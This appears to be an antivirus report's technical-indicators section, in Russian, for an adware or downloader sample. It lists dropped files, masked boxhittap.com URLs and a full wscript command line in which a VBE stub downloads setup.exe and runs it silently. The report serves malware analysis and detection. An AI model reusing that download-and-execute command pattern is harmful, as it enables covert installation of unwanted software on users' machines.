Техническая информация
- %TEMP%\stb1.tmp\setup.exe -i d9e3784a89564587a5b986eb426798b0 -p finderquery /S
- %TEMP%\stb1.tmp\setup.exe (загружен из сети Интернет)
- <SYSTEM32>\wscript.exe /B "%TEMP%\stb2.tmp\stub.vbe" "http://li#####.boxhittap.com/install.aspx?b=#####################" "%TEMP%\stb1.tmp\setup.exe" ""%TEMP%\stb1.tmp\setup.exe" -i d9e3784a89564587a5b986eb426798b0 -p finderquery /S" "http://li#####.boxhittap.com/?vn####################################################################################################################################################################################################################" 0 1
- %TEMP%\stb1.tmp\setup.exe
- %TEMP%\stb2.tmp\stub.vbe
- 'li#####.boxhittap.com':80
- li#####.boxhittap.com/?vn##################################################################################################################################################################################################################
- li#####.boxhittap.com/install.aspx?b=#####################
- DNS ASK li#####.boxhittap.com
- '<IP-адрес в локальной сети>':1035
- ClassName: 'Shell_TrayWnd' WindowName: ''